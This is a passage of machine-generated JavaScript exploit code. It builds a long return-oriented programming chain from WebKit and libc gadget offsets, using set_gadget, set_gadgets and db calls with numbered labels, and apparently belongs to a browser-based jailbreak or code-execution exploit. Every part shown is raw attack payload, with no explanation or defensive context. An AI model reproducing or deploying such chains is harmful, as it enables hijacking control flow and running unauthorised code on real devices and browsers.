webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286176, //L5488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5488: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5489: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5490: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286320, //L5491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286352, //L5493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286336, //L5492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L5491: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5492: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5493: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5494: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5495: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L5435: libc_base+764760, //pop rsi ropchain+286616, //L5497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286632, //L5498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+286600, //L5496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5496: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5498: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286792, //L5502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+286760, //L5500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286776, //L5501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5499: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L5500: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5501: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5502: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+286848, //L5504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5504: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+286976, //L5506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286992, //L5507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286960, //L5505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5505: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5507: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+287088, //L5509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+287072, //L5508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5508: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5509: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+287184, //L5511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5510: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L5511: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+287264, //L5513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5513: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287320, //L5514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5514: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287400, //L5516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5516: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5518: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+287520, //L5521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+287504, //L5519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5519: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+287664, //L5524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+287632, //L5522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+287648, //L5523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5522: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); 
//pop rax //L5524: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287752, //L5526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5525: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5526: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+287808, //L5527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5527: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5529: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+287888, //L5531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5531: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+287992, //L5532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+288008, //L5533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5532: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5533: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+288096, //L5535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5535: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288152, //L5536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5536: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+288224, //L5539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5539: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288280, //L5540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5540: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+288368, //L5542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5542: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5544: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+288488, //L5547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288472, //L5545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5545: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5547: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288632, //L5550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288600, //L5548 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+288616, //L5549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5548: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5549: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5550: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+288712, //L5551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5551: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5553: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+288832, //L5556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+288816, //L5554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5554: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+288944, //L5557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+288976, //L5559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+288960, //L5558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5557: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5558: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5559: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+289144, //L5562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+289112, //L5560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+289128, //L5561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5560: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5562: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+289224, //L5563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5565: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5567: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+289384, //L5570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289368, //L5568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5568: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5570: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+289544, //L5575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+289560, //L5576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+764760, //pop rsi ropchain+289496, //L5572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5572: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5573: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5574: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5576: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+289672, //L5577+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+289664, //L5577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5577: db([0, 0]); // 0x0 set_gadgets([ ropchain+289688, //L5577+24 ropchain+290640, //L5571 libc_base+764760, //pop rsi ropchain+289728, //L5578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5578: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5580: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+289848, //L5583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289832, //L5581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5581: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+289992, //L5586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+289960, //L5584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+764760, //pop rsi ropchain+289976, //L5585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5584: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+290088, //L5588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5587: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5588: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5589: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+290192, //L5590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290208, //L5591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5590: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5591: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+290384, //L5593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290400, //L5594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+290368, //L5592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5592: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L5593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+290544, //L5597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290560, //L5598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+290512, //L5595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5595: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5596: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5597: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5598: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+290632, //L5599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5599: db([0, 0]); // 0x0 //L5571: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+290760, //L5602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+290776, //L5603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+290744, //L5601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5601: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5602: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5603: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+290888, //L5605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
//pop rsi ropchain+290936, //L5608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+290904, //L5606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5605: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5606: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5607: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5608: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+291048, //L5609+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+291040, //L5609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5609: db([0, 0]); // 0x0 set_gadgets([ ropchain+291064, //L5609+24 ropchain+291080, //L5604 libc_base+782311, //pop rsp ropchain+279792, //L5328 //L5604: //L5610: //L5322: libc_base+764760, //pop rsi ropchain+291120, //L5611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5611: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5613: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+291240, //L5616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291224, //L5614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5614: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5616: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+291416, //L5619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
//pop rsi ropchain+291432, //L5620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291384, //L5617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+291400, //L5618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5617: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5618: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5620: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+291528, //L5622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+291512, //L5621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5622: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+291608, //L5623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5623: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5625: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+291728, //L5628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291712, //L5626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5628: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi 
ropchain+291904, //L5631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+291920, //L5632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+291872, //L5629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+291888, //L5630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5629: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5630: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5631: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5632: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+292016, //L5634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+292000, //L5633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5634: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+292096, //L5635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5637: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+292216, //L5640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+292200, //L5638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5638: db([0, 0]); // 0x0 
